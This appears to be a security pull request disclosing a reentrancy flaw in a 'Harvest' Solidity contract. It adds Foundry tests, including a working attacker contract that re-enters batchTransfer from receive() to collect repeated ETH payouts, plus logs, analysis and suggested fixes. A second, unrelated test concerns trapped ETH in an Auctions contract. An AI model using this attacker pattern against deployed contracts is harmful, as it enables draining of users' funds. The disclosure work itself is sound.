### PR TITLE
[HIGH] Harvest reentrancy vunerability

### DIFF
--- a/test/AuctionsVulnerabilityPoC.t.sol
+++ b/test/AuctionsVulnerabilityPoC.t.sol
@@ -1,0 +1,82 @@
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.8.25;
+
+import "forge-std/Test.sol";
+import "../src/Auctions.sol";
+import "../src/BidTicket.sol";
+import "./lib/Mock721.sol";
+import "./lib/Mock1155.sol";
+
+contract AuctionsVulnerabilityPoC is Test {
+    Auctions public auctions;
+    BidTicket public bidTicket;
+    Mock721 public mock721;
+    Mock1155 public mock1155;
+
+    address public theBarn;
+    address public user1;
+    address public user2;
+    address public owner;
+
+    uint256[] public tokenIds = [0, 1, 2];
+
+    function setUp() public {
+        owner = address(this);
+        theBarn = vm.addr(1);
+        user1 = vm.addr(2);
+        user2 = vm.addr(3);
+
+        bidTicket = new BidTicket(owner);
+        auctions = new Auctions(owner, theBarn, address(bidTicket));
+        mock721 = new Mock721();
+        mock1155 = new Mock1155();
+
+        bidTicket.setAuctionsContract(address(auctions));
+        bidTicket.mint(user1, 1, 100);
+        bidTicket.mint(user2, 1, 100);
+
+        vm.deal(user1, 10 ether);
+        vm.deal(user2, 10 ether);
+
+        mock721.mint(theBarn, 10);
+        vm.prank(theBarn);
+        mock721.setApprovalForAll(address(auctions), true);
+    }
+
+    function test_VulnerabilityPoC() public {
+        // Step 1: Set up an auction
+        vm.prank(user1);
+        auctions.startAuctionERC721{value: 0.05 ether}(0.05 ether, address(mock721), tokenIds);
+
+        uint256 auctionId = auctions.nextAuctionId() - 1;
+
+        // Step 2: Simulate normal bidding
+        vm.prank(user2);
+        auctions.bid{value: 0.06 ether}(auctionId, 0.06 ether);
+
+        // Step 3: End the auction and claim
+        vm.warp(block.timestamp + 7 days);
+        vm.prank(user2);
+        auctions.claim(auctionId);
+
+        // Step 4: Attempt to withdraw as owner
+        uint256 initialBalance = address(auctions).balance;
+        uint256 ownerInitialBalance = owner.balance;
+
+        uint256[] memory auctionIds = new uint256[](1);
+        auctionIds[0] = auctionId;
+
+        vm.expectRevert(abi.encodeWithSignature("TransferFailed()"));
+        auctions.withdraw(auctionIds);
+
+        assertEq(address(auctions).balance, initialBalance, "Contract balance should not change");
+        assertEq(owner.balance, ownerInitialBalance, "Owner balance should not change");
+
+        // Severity assessment
+        console.log("Vulnerability PoC Results:");
+        console.log("1. Ether trapped in contract: ", address(auctions).balance);
+        console.log("2. Owner cannot withdraw trapped Ether: Yes");
+        console.log("Severity: High");
+        console.log("This vulnerability prevents the owner from withdrawing Ether from completed auctions, potentially leading to loss of funds.");
+    }
+}

--- a/test/HavertVulnerability.t.sol
+++ b/test/HavertVulnerability.t.sol
@@ -1,0 +1,162 @@
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.8.25;
+
+import "forge-std/Test.sol";
+import "forge-std/console.sol";
+import "../src/Harvest.sol";
+import "../src/BidTicket.sol";
+import "./lib/Mock721.sol";
+import "./lib/Mock1155.sol";
+import "./lib/Mock20.sol";
+import "@openzeppelin/contracts/token/ERC721/IERC721Receiver.sol";
+import "@openzeppelin/contracts/token/ERC1155/IERC1155Receiver.sol";
+
+contract ReentrancyAttacker is IERC721Receiver, IERC1155Receiver {
+    Harvest public harvest;
+    uint256 public attackCount;
+    bool public attackMode;
+    uint256 public initialBalance;
+    uint256 public finalBalance;
+    uint256[] public receivedAmounts;
+
+    constructor(Harvest _harvest) {
+        harvest = _harvest;
+    }
+
+    function attack(TokenType[] calldata types, address[] calldata contracts, uint256[] calldata tokenIds, uint256[] calldata counts) external {
+        initialBalance = address(this).balance;
+        attackMode = true;
+        harvest.batchTransfer(types, contracts, tokenIds, counts);
+        attackMode = false;
+        finalBalance = address(this).balance;
+    }
+
+    receive() external payable {
+        receivedAmounts.push(msg.value);
+        if (attackMode && attackCount < 3) {
+            attackCount++;
+            TokenType[] memory types = new TokenType[](1);
+            address[] memory contracts = new address[](1);
+            uint256[] memory tokenIds = new uint256[](1);
+            uint256[] memory counts = new uint256[](1);
+            
+            types[0] = TokenType.ERC721;
+            contracts[0] = address(0x5991A2dF15A8F6A256D3Ec51E99254Cd3fb576A9); 
+            tokenIds[0] = attackCount + 1;
+            counts[0] = 0;
+
+            harvest.batchTransfer(types, contracts, tokenIds, counts);
+        }
+    }
+
+    function onERC721Received(address, address, uint256, bytes memory) public virtual override returns (bytes4) {
+        return this.onERC721Received.selector;
+    }
+
+    function onERC1155Received(address, address, uint256, uint256, bytes memory) public virtual override returns (bytes4) {
+        return this.onERC1155Received.selector;
+    }
+
+    function onERC1155BatchReceived(address, address, uint256[] memory, uint256[] memory, bytes memory) public virtual override returns (bytes4) {
+        return this.onERC1155BatchReceived.selector;
+    }
+
+    function getReceivedAmounts() public view returns (uint256[] memory) {
+        return receivedAmounts;
+    }
+
+    function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
+        return
+            interfaceId == type(IERC721Receiver).interfaceId ||
+            interfaceId == type(IERC1155Receiver).interfaceId;
+    }
+}
+
+contract HarvestReentrancyTest is Test {
+    Harvest public harvest;
+    BidTicket public bidTicket;
+    Mock721 public mock721;
+    ReentrancyAttacker public attacker;
+
+    address public theBarn;
+    address public user1;
+
+    function setUp() public {
+        theBarn = vm.addr(1);
+        user1 = vm.addr(2);
+
+        bidTicket = new BidTicket(address(this));
+        harvest = new Harvest(address(this), theBarn, address(bidTicket));
+        attacker = new ReentrancyAttacker(harvest);
+
+        bidTicket.setHarvestContract(address(harvest));
+
+        mock721 = new Mock721();
+        mock721.mint(address(attacker), 10); 
+
+        vm.deal(address(harvest), 10 ether);
+        vm.deal(address(attacker), 1 ether);
+
+        harvest.setPrice(0.1 ether);
+    }
+
+    function testReentrancyHavertAttack() public {
+        console.log("--- Starting Reentrancy Attack Test ---");
+        console.log("Initial Harvest balance:", address(harvest).balance);
+        console.log("Initial Attacker balance:", address(attacker).balance);
+        console.log("Harvest price:", harvest.price());
+
+        TokenType[] memory types = new TokenType[](1);
+        address[] memory contracts = new address[](1);
+        uint256[] memory tokenIds = new uint256[](1);
+        uint256[] memory counts = new uint256[](1);
+
+        types[0] = TokenType.ERC721;
+        contracts[0] = address(mock721);
+        tokenIds[0] = 1;
+        counts[0] = 0;
+
+        vm.startPrank(address(attacker));
+        mock721.setApprovalForAll(address(harvest), true);
+        attacker.attack(types, contracts, tokenIds, counts);
+        vm.stopPrank();
+
+        console.log("--- Attack Completed ---");
+        console.log("Final Harvest balance:", address(harvest).balance);
+        console.log("Final Attacker balance:", address(attacker).balance);
+        console.log("Attack count:", attacker.attackCount());
+
+        uint256 balanceIncrease = address(attacker).balance - attacker.initialBalance();
+        console.log("Attacker balance increase:", balanceIncrease);
+
+        uint256[] memory receivedAmounts = attacker.getReceivedAmounts();
+        console.log("Received amounts:");
+        for (uint i = 0; i < receivedAmounts.length; i++) {
+            console.log("  Payment", i + 1, ":", receivedAmounts[i]);
+        }
+
+        assertGt(attacker.attackCount(), 1, "Reentrancy attack failed");
+        assertGt(balanceIncrease, harvest.price(), "Attacker didn't receive more ETH than expected");
+        
+        uint256 expectedPayment = harvest.price() * (attacker.attackCount() + 1);
+        assertEq(balanceIncrease, expectedPayment, "Attacker received incorrect amount of ETH");
+
+        uint256 totalReceived = 0;
+        for (uint i = 0; i < receivedAmounts.length; i++) {
+            totalReceived += receivedAmounts[i];
+        }
+        assertEq(totalReceived, balanceIncrease, "Sum of received amounts doesn't match balance increase");
+
+        console.log("--- Vulnerability Analysis ---");
+        console.log("Expected single payment:", harvest.price());
+        console.log("Total payments received:", balanceIncrease);
+        console.log("Number of successful reentrant calls:", attacker.attackCount());
+        console.log("Excess ETH received:", balanceIncrease - harvest.price());
+
+        uint256 bidTicketBalance = bidTicket.balanceOf(address(attacker), harvest.bidTicketTokenId());
+        console.log("BidTickets minted to attacker:", bidTicketBalance);
+        assertEq(bidTicketBalance, attacker.attackCount() + 1, "Incorrect number of BidTickets minted");
+
+        console.log("--- Reentrancy Attack Test Completed ---");
+    }
+}


### PR DESCRIPTION
# Harvest Contract Reentrancy Vulnerability Report

## Executive Summary

We found a reentrancy bug in the Harvest contract. This bug lets attackers make multiple token transfers and get more ETH than they should. This could drain the contract's funds.

## Running Vunerability test 
```solidity
 forge test --match-test testReentrancyHavertAttack  -vvv         
[⠊] Compiling...
[⠆] Compiling 1 files with Solc 0.8.26
[⠰] Solc 0.8.26 finished in 8.54s
Compiler run successful!

Ran 1 test for test/HavertVulnerability.t.sol:HarvestReentrancyTest
[PASS] testReentrancyHavertAttack() (gas: 614405)
Logs:
  --- Starting Reentrancy Attack Test ---
  Initial Harvest balance: 10000000000000000000
  Initial Attacker balance: 1000000000000000000
  Harvest price: 100000000000000000
  --- Attack Completed ---
  Final Harvest balance: 9600000000000000000
  Final Attacker balance: 1400000000000000000
  Attack count: 3
  Attacker balance increase: 400000000000000000
  Received amounts:
    Payment 1 : 100000000000000000
    Payment 2 : 100000000000000000
    Payment 3 : 100000000000000000
    Payment 4 : 100000000000000000
  --- Vulnerability Analysis ---
  Expected single payment: 100000000000000000
  Total payments received: 400000000000000000
  Number of successful reentrant calls: 3
  Excess ETH received: 300000000000000000
  BidTickets minted to attacker: 4
  --- Reentrancy Attack Test Completed ---

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 10.68ms (2.33ms CPU time)

Ran 1 test suite in 147.42ms (10.68ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests)
```
## Vulnerability Details

### Location
The bug is in the `batchTransfer` function of the Harvest contract.

### Description
The Harvest contract allows batch transfers of different token types (ERC20, ERC721, ERC1155). After each successful transfer, the contract sends ETH to the sender as a reward. However, the contract sends ETH before updating its internal state, allowing a reentrancy attack.

### Vulnerable Code
```solidity
 function batchTransfer(
        TokenType[] calldata types,
        address[] calldata contracts,
        uint256[] calldata tokenIds,
        uint256[] calldata counts
    ) external {
        uint256 length = contracts.length;

        if (length == 0) {
            revert InvalidTokenContractLength();
        }

        if (length != tokenIds.length || length != counts.length || length != types.length) {
            revert InvalidParamsLength();
        }

        uint256 totalTokens;
        uint256 totalPrice;
        address currentContract = contracts[0];

        for (uint256 i; i < length; ++i) {
            TokenType tokenType = types[i];
            address tokenContract = contracts[i] == address(0) ? currentContract : contracts[i];
            currentContract = tokenContract;

            if (tokenType == TokenType.ERC20) {
                unchecked {
                    ++totalTokens;
                    totalPrice += price;
                }
                bool success = IERC20(tokenContract).transferFrom(msg.sender, theBarn, counts[i]);
                if (!success) revert TransferFailed();
            } else if (tokenType == TokenType.ERC721) {
                unchecked {
                    ++totalTokens;
                    totalPrice += price;
                }
                IERC721(tokenContract).transferFrom(msg.sender, theBarn, tokenIds[i]);
            } else if (tokenType == TokenType.ERC1155) {
                uint256 count = counts[i];
                unchecked {
                    totalTokens += count;
                    totalPrice += price * count;
                }
                IERC1155(tokenContract).safeTransferFrom(msg.sender, theBarn, tokenIds[i], count, "");
            } else {
                revert InvalidTokenType();
            }
        }

        if (totalTokens > maxTokensPerTx) {
            revert MaxTokensPerTxReached();
        }

        bidTicket.mint(msg.sender, bidTicketTokenId, totalTokens);

        emit BatchTransfer(msg.sender, totalTokens);

        (bool sent,) = payable(msg.sender).call{value: totalPrice}("");
        if (!sent) revert TransferFailed();
    }
```

## Proof of Concept

We created an attacker contract to show how this bug can be exploited:

1. The attacker starts a legitimate token transfer.
2. When the Harvest contract tries to send ETH to the attacker, it triggers the attacker's `receive()` function.
3. Inside `receive()`, the attacker calls `batchTransfer` again.
4. This repeats until it reaches a set limit.

### Test Results

Our `testReentrancyHavertAttack` test shows the attack works:

- Successful reentrant calls: 3
- ETH received by attacker: 0.4 ether (4 times the expected 0.1 ether price)
- BidTickets minted to attacker: 4 (1 more than expected)

## Impact

This bug can cause:

1. Draining of Harvest contract funds.
2. Too many BidTickets being minted.
3. Mismatch between transferred tokens and paid ETH.

## Recommendations

To fix this bug, we suggest:

1. Use the checks-effects-interactions pattern:
   - Update all internal states before making external transfers.

2. Use a reentrancy lock:
   - Add a `nonReentrant` modifier using the OpenZeppelin library or similar.

3. Consider a pull-over-push pattern for payments:
   - Instead of sending ETH automatically, let users request their payments separately.

## Suggested Fixed Code

```solidity
import "@openzeppelin/contracts/security/ReentrancyGuard.sol";

contract Harvest is ReentrancyGuard {
    // ... (other contract code)

    function batchTransfer(
        TokenType[] calldata types,
        address[] calldata contracts,
        uint256[] calldata tokenIds,
        uint256[] calldata counts
    ) external nonReentrant {
        // ... (token transfer code)

        bidTicket.mint(msg.sender, bidTicketTokenId, totalTokens);

        emit BatchTransfer(msg.sender, totalTokens);

        // Update user balance instead of transferring immediately
        userBalances[msg.sender] += totalPrice;
    }

    function withdrawBalance() external nonReentrant {
        uint256 amount = userBalances[msg.sender];
        userBalances[msg.sender] = 0;
        (bool sent,) = payable(msg.sender).call{value: amount}("");
        if (!sent) revert TransferFailed();
    }
}
```

## Conclusion

The reentrancy bug in the Harvest contract is a big risk to the system's safety and integrity. We recommend applying the suggested fixes and doing a full audit of the contract before any (re)deployment.

<img width="1221" alt="Screenshot 2024-08-20 at 22 43 24" src="https://github.com/user-attachments/assets/f4b2939a-7c12-40a3-881c-d1337458487a">
